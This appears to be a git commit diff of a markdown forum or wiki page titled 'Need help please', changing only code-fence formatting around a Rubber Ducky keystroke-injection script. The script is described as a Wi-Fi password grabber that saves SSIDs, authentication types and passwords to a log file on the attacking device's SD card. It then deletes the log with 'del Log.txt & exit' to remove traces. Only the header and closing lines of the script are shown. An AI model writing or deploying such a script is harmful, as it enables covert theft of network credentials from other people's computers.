Updated Need help please. (Rubber Ducky)(Network info grabber) (markdown)

This commit is contained in:
berkeley_blue 2017-07-02 05:54:55 +03:00
parent 59dab3ad55
commit bbf87f539e
1 changed files with 4 additions and 2 deletions

View File

@ -1,4 +1,5 @@
`REM Title: WiFi password grabber save to twin duck SD
```
REM Title: WiFi password grabber save to twin duck SD
REM Author: silent_noise
REM Original by: Siem
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the CD card on the twin duck
@ -70,7 +71,8 @@ ENTER
DELAY 500
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER`
ENTER
```